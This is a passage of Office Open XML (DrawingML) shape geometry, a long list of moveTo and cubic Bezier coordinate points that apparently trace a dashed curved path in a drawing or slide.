                    <a:pt x="2101" y="789"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2100" y="787"/>
                    <a:pt x="2098" y="786"/>
                    <a:pt x="2096" y="786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2094" y="787"/>
                    <a:pt x="2092" y="789"/>
                    <a:pt x="2093" y="791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="791"/>
                    <a:pt x="2093" y="791"/>
                    <a:pt x="2093" y="791"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2082" y="753"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2084" y="759"/>
                    <a:pt x="2086" y="766"/>
                    <a:pt x="2088" y="772"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2088" y="774"/>
                    <a:pt x="2090" y="775"/>
                    <a:pt x="2093" y="775"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2095" y="774"/>
                    <a:pt x="2096" y="772"/>
                    <a:pt x="2095" y="770"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="763"/>
                    <a:pt x="2091" y="757"/>
                    <a:pt x="2089" y="751"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2089" y="748"/>
                    <a:pt x="2087" y="747"/>
                    <a:pt x="2084" y="748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2082" y="749"/>
                    <a:pt x="2081" y="751"/>
                    <a:pt x="2082" y="753"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2082" y="753"/>
                    <a:pt x="2082" y="753"/>
                    <a:pt x="2082" y="753"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2069" y="715"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2071" y="721"/>
                    <a:pt x="2074" y="728"/>
                    <a:pt x="2076" y="734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="736"/>
                    <a:pt x="2079" y="737"/>
                    <a:pt x="2081" y="737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2083" y="736"/>
                    <a:pt x="2084" y="734"/>
                    <a:pt x="2083" y="731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2081" y="725"/>
                    <a:pt x="2079" y="719"/>
                    <a:pt x="2077" y="712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="710"/>
                    <a:pt x="2074" y="709"/>
                    <a:pt x="2072" y="710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2070" y="711"/>
                    <a:pt x="2069" y="713"/>
                    <a:pt x="2069" y="715"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2055" y="678"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2058" y="684"/>
                    <a:pt x="2060" y="690"/>
                    <a:pt x="2062" y="696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2063" y="698"/>
                    <a:pt x="2065" y="699"/>
                    <a:pt x="2068" y="699"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2070" y="698"/>
                    <a:pt x="2071" y="696"/>
                    <a:pt x="2070" y="694"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2068" y="687"/>
                    <a:pt x="2065" y="681"/>
                    <a:pt x="2063" y="675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2062" y="673"/>
                    <a:pt x="2060" y="672"/>
                    <a:pt x="2057" y="673"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="673"/>
                    <a:pt x="2054" y="676"/>
                    <a:pt x="2055" y="678"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2040" y="641"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2043" y="647"/>
                    <a:pt x="2045" y="653"/>
                    <a:pt x="2048" y="659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2049" y="661"/>
                    <a:pt x="2051" y="662"/>
                    <a:pt x="2053" y="662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="661"/>
                    <a:pt x="2056" y="658"/>
                    <a:pt x="2055" y="656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2053" y="650"/>
                    <a:pt x="2050" y="644"/>
                    <a:pt x="2047" y="638"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2046" y="636"/>
                    <a:pt x="2044" y="635"/>
                    <a:pt x="2042" y="636"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2040" y="637"/>
                    <a:pt x="2039" y="639"/>
                    <a:pt x="2040" y="641"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2040" y="641"/>
                    <a:pt x="2040" y="641"/>
                    <a:pt x="2040" y="641"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2023" y="605"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2026" y="611"/>
                    <a:pt x="2029" y="617"/>
                    <a:pt x="2032" y="623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2033" y="625"/>
                    <a:pt x="2035" y="626"/>
                    <a:pt x="2037" y="625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2039" y="624"/>
                    <a:pt x="2040" y="622"/>
                    <a:pt x="2039" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2036" y="614"/>
                    <a:pt x="2033" y="608"/>
                    <a:pt x="2030" y="602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2029" y="600"/>
                    <a:pt x="2027" y="599"/>
                    <a:pt x="2025" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2023" y="601"/>
                    <a:pt x="2022" y="603"/>
                    <a:pt x="2023" y="605"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2005" y="570"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2008" y="575"/>
                    <a:pt x="2011" y="581"/>
                    <a:pt x="2014" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2015" y="589"/>
                    <a:pt x="2018" y="590"/>
                    <a:pt x="2020" y="589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2022" y="588"/>
                    <a:pt x="2022" y="586"/>
                    <a:pt x="2021" y="584"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018" y="578"/>
                    <a:pt x="2015" y="572"/>
                    <a:pt x="2012" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2011" y="564"/>
                    <a:pt x="2009" y="563"/>
                    <a:pt x="2007" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2005" y="565"/>
                    <a:pt x="2004" y="568"/>
                    <a:pt x="2005" y="570"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1986" y="535"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="541"/>
                    <a:pt x="1992" y="546"/>
                    <a:pt x="1995" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1997" y="554"/>
                    <a:pt x="1999" y="555"/>
                    <a:pt x="2001" y="554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2003" y="553"/>
                    <a:pt x="2004" y="550"/>
                    <a:pt x="2002" y="548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1999" y="542"/>
                    <a:pt x="1996" y="537"/>
                    <a:pt x="1993" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1991" y="529"/>
                    <a:pt x="1989" y="528"/>
                    <a:pt x="1987" y="529"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1985" y="531"/>
                    <a:pt x="1984" y="533"/>
                    <a:pt x="1986" y="535"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1965" y="501"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1968" y="506"/>
                    <a:pt x="1972" y="512"/>
                    <a:pt x="1975" y="518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1977" y="520"/>
                    <a:pt x="1979" y="520"/>
                    <a:pt x="1981" y="519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1983" y="518"/>
                    <a:pt x="1983" y="515"/>
                    <a:pt x="1982" y="514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1979" y="508"/>
                    <a:pt x="1975" y="502"/>
                    <a:pt x="1972" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1970" y="495"/>
                    <a:pt x="1968" y="494"/>
                    <a:pt x="1966" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1964" y="497"/>
                    <a:pt x="1964" y="499"/>
                    <a:pt x="1965" y="501"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1943" y="468"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="473"/>
                    <a:pt x="1950" y="479"/>
                    <a:pt x="1954" y="484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1955" y="486"/>
                    <a:pt x="1958" y="486"/>
                    <a:pt x="1960" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1961" y="484"/>
                    <a:pt x="1962" y="482"/>
                    <a:pt x="1961" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1957" y="474"/>
                    <a:pt x="1953" y="469"/>
                    <a:pt x="1949" y="463"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1948" y="461"/>
                    <a:pt x="1946" y="461"/>
                    <a:pt x="1944" y="462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1942" y="463"/>
                    <a:pt x="1942" y="466"/>
                    <a:pt x="1943" y="468"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1920" y="435"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1924" y="441"/>
                    <a:pt x="1928" y="446"/>
                    <a:pt x="1931" y="451"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1933" y="453"/>
                    <a:pt x="1935" y="454"/>
                    <a:pt x="1937" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1939" y="451"/>
                    <a:pt x="1939" y="448"/>
                    <a:pt x="1938" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1934" y="441"/>
                    <a:pt x="1930" y="436"/>
                    <a:pt x="1926" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1925" y="429"/>
                    <a:pt x="1922" y="428"/>
                    <a:pt x="1920" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1919" y="431"/>
                    <a:pt x="1918" y="434"/>
                    <a:pt x="1920" y="435"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1895" y="404"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1899" y="409"/>
                    <a:pt x="1904" y="414"/>
                    <a:pt x="1908" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1909" y="421"/>
                    <a:pt x="1911" y="421"/>
                    <a:pt x="1913" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1915" y="419"/>
                    <a:pt x="1915" y="416"/>
                    <a:pt x="1914" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1910" y="409"/>
                    <a:pt x="1906" y="404"/>
                    <a:pt x="1901" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1900" y="397"/>
                    <a:pt x="1898" y="397"/>
                    <a:pt x="1896" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1894" y="400"/>
                    <a:pt x="1894" y="402"/>
                    <a:pt x="1895" y="404"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1870" y="373"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="378"/>
                    <a:pt x="1878" y="383"/>
                    <a:pt x="1883" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1884" y="390"/>
                    <a:pt x="1887" y="390"/>
                    <a:pt x="1888" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1890" y="387"/>
                    <a:pt x="1890" y="385"/>
                    <a:pt x="1889" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1884" y="378"/>
                    <a:pt x="1880" y="373"/>
                    <a:pt x="1876" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="366"/>
                    <a:pt x="1872" y="366"/>
                    <a:pt x="1870" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1868" y="369"/>
                    <a:pt x="1868" y="372"/>
                    <a:pt x="1870" y="373"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1843" y="344"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="348"/>
                    <a:pt x="1852" y="353"/>
                    <a:pt x="1856" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="360"/>
                    <a:pt x="1860" y="360"/>
                    <a:pt x="1862" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1864" y="357"/>
                    <a:pt x="1864" y="355"/>
                    <a:pt x="1862" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="348"/>
                    <a:pt x="1853" y="343"/>
                    <a:pt x="1849" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="337"/>
                    <a:pt x="1845" y="336"/>
                    <a:pt x="1843" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1841" y="339"/>
                    <a:pt x="1841" y="342"/>
                    <a:pt x="1843" y="344"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1815" y="315"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1820" y="320"/>
                    <a:pt x="1824" y="324"/>
                    <a:pt x="1829" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1831" y="331"/>
                    <a:pt x="1833" y="331"/>
                    <a:pt x="1835" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1836" y="328"/>
                    <a:pt x="1836" y="325"/>
                    <a:pt x="1835" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1830" y="319"/>
                    <a:pt x="1825" y="314"/>
                    <a:pt x="1821" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1819" y="308"/>
                    <a:pt x="1817" y="308"/>
                    <a:pt x="1815" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1813" y="311"/>
                    <a:pt x="1814" y="313"/>
                    <a:pt x="1815" y="315"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1786" y="287"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1791" y="292"/>
                    <a:pt x="1796" y="297"/>
                    <a:pt x="1801" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1802" y="303"/>
                    <a:pt x="1805" y="303"/>
                    <a:pt x="1806" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1808" y="299"/>
                    <a:pt x="1808" y="297"/>
                    <a:pt x="1806" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1801" y="291"/>
                    <a:pt x="1797" y="286"/>
                    <a:pt x="1792" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1790" y="280"/>
                    <a:pt x="1787" y="280"/>
                    <a:pt x="1786" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1784" y="283"/>
                    <a:pt x="1785" y="286"/>
                    <a:pt x="1786" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1786" y="287"/>
                    <a:pt x="1786" y="287"/>
                    <a:pt x="1786" y="287"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1756" y="261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1761" y="265"/>
                    <a:pt x="1766" y="270"/>
                    <a:pt x="1771" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1773" y="276"/>
                    <a:pt x="1776" y="275"/>
                    <a:pt x="1777" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1778" y="272"/>
                    <a:pt x="1778" y="270"/>
                    <a:pt x="1777" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="264"/>
                    <a:pt x="1767" y="259"/>
                    <a:pt x="1761" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1760" y="254"/>
                    <a:pt x="1757" y="254"/>
                    <a:pt x="1756" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1754" y="257"/>
                    <a:pt x="1755" y="260"/>
                    <a:pt x="1756" y="261"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1725" y="236"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1731" y="240"/>
                    <a:pt x="1736" y="244"/>
                    <a:pt x="1741" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1743" y="250"/>
                    <a:pt x="1745" y="249"/>
                    <a:pt x="1747" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1748" y="246"/>
                    <a:pt x="1748" y="243"/>
                    <a:pt x="1746" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1741" y="238"/>
                    <a:pt x="1736" y="234"/>
                    <a:pt x="1730" y="229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1729" y="228"/>
                    <a:pt x="1726" y="228"/>
                    <a:pt x="1725" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1723" y="232"/>
                    <a:pt x="1724" y="234"/>
                    <a:pt x="1725" y="236"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1694" y="212"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1699" y="216"/>
                    <a:pt x="1704" y="219"/>
                    <a:pt x="1710" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1711" y="225"/>
                    <a:pt x="1714" y="225"/>
                    <a:pt x="1715" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1717" y="221"/>
                    <a:pt x="1716" y="218"/>
                    <a:pt x="1714" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1709" y="213"/>
                    <a:pt x="1704" y="209"/>
                    <a:pt x="1698" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1697" y="204"/>
                    <a:pt x="1694" y="204"/>
                    <a:pt x="1693" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1691" y="208"/>
                    <a:pt x="1692" y="210"/>
                    <a:pt x="1694" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1694" y="212"/>
                    <a:pt x="1694" y="212"/>
                    <a:pt x="1694" y="212"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1661" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1666" y="192"/>
                    <a:pt x="1672" y="196"/>
                    <a:pt x="1677" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1679" y="201"/>
                    <a:pt x="1682" y="201"/>
                    <a:pt x="1683" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1684" y="197"/>
                    <a:pt x="1684" y="195"/>
                    <a:pt x="1682" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1676" y="190"/>
                    <a:pt x="1671" y="186"/>
                    <a:pt x="1665" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1664" y="181"/>
                    <a:pt x="1661" y="181"/>
                    <a:pt x="1660" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1659" y="185"/>
                    <a:pt x="1659" y="187"/>
                    <a:pt x="1661" y="189"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1627" y="167"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1633" y="170"/>
                    <a:pt x="1639" y="174"/>
                    <a:pt x="1644" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1646" y="179"/>
                    <a:pt x="1649" y="178"/>
                    <a:pt x="1650" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1651" y="175"/>
                    <a:pt x="1650" y="172"/>
                    <a:pt x="1649" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1643" y="167"/>
                    <a:pt x="1637" y="164"/>
                    <a:pt x="1632" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1630" y="159"/>
                    <a:pt x="1627" y="160"/>
                    <a:pt x="1626" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1625" y="163"/>
                    <a:pt x="1625" y="166"/>
                    <a:pt x="1627" y="167"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1593" y="147"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1599" y="150"/>
                    <a:pt x="1605" y="153"/>
                    <a:pt x="1610" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1612" y="158"/>
                    <a:pt x="1615" y="157"/>
                    <a:pt x="1616" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="153"/>
                    <a:pt x="1616" y="151"/>
                    <a:pt x="1614" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1609" y="146"/>
                    <a:pt x="1603" y="143"/>
                    <a:pt x="1597" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1595" y="138"/>
                    <a:pt x="1593" y="139"/>
                    <a:pt x="1592" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1590" y="143"/>
                    <a:pt x="1591" y="145"/>
                    <a:pt x="1593" y="147"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1558" y="127"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1564" y="130"/>
                    <a:pt x="1570" y="134"/>
                    <a:pt x="1576" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1577" y="138"/>
                    <a:pt x="1580" y="137"/>
                    <a:pt x="1581" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1582" y="133"/>
                    <a:pt x="1581" y="131"/>
                    <a:pt x="1579" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1573" y="127"/>
                    <a:pt x="1568" y="123"/>
                    <a:pt x="1562" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1560" y="119"/>
                    <a:pt x="1557" y="120"/>
                    <a:pt x="1556" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1555" y="124"/>
                    <a:pt x="1556" y="126"/>
                    <a:pt x="1558" y="127"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1522" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1528" y="112"/>
                    <a:pt x="1534" y="115"/>
                    <a:pt x="1540" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1542" y="119"/>
                    <a:pt x="1544" y="119"/>
                    <a:pt x="1545" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1546" y="115"/>
                    <a:pt x="1546" y="112"/>
                    <a:pt x="1544" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1538" y="108"/>
                    <a:pt x="1532" y="105"/>
                    <a:pt x="1525" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1523" y="101"/>
                    <a:pt x="1521" y="102"/>
                    <a:pt x="1520" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1519" y="106"/>
                    <a:pt x="1520" y="109"/>
                    <a:pt x="1522" y="110"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1486" y="93"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1492" y="96"/>
                    <a:pt x="1498" y="99"/>
                    <a:pt x="1504" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1506" y="102"/>
                    <a:pt x="1508" y="101"/>
                    <a:pt x="1509" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1510" y="97"/>
                    <a:pt x="1509" y="95"/>
                    <a:pt x="1507" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1501" y="91"/>
                    <a:pt x="1495" y="88"/>
                    <a:pt x="1489" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1487" y="85"/>
                    <a:pt x="1484" y="86"/>
                    <a:pt x="1483" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1483" y="90"/>
                    <a:pt x="1484" y="92"/>
                    <a:pt x="1486" y="93"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1448" y="78"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1455" y="81"/>
                    <a:pt x="1461" y="83"/>
                    <a:pt x="1467" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1469" y="86"/>
                    <a:pt x="1471" y="85"/>
                    <a:pt x="1472" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1473" y="81"/>
                    <a:pt x="1472" y="79"/>
                    <a:pt x="1470" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1464" y="76"/>
                    <a:pt x="1458" y="73"/>
                    <a:pt x="1451" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1449" y="70"/>
                    <a:pt x="1447" y="71"/>
                    <a:pt x="1446" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1445" y="75"/>
                    <a:pt x="1446" y="77"/>
                    <a:pt x="1448" y="78"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1411" y="65"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1417" y="67"/>
                    <a:pt x="1423" y="69"/>
                    <a:pt x="1430" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1432" y="72"/>
                    <a:pt x="1434" y="71"/>
                    <a:pt x="1435" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1436" y="67"/>
                    <a:pt x="1435" y="64"/>
                    <a:pt x="1432" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1426" y="61"/>
                    <a:pt x="1420" y="59"/>
                    <a:pt x="1413" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1411" y="56"/>
                    <a:pt x="1409" y="57"/>
                    <a:pt x="1408" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1408" y="62"/>
                    <a:pt x="1409" y="64"/>
                    <a:pt x="1411" y="65"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1373" y="52"/>
                  </a:moveTo>
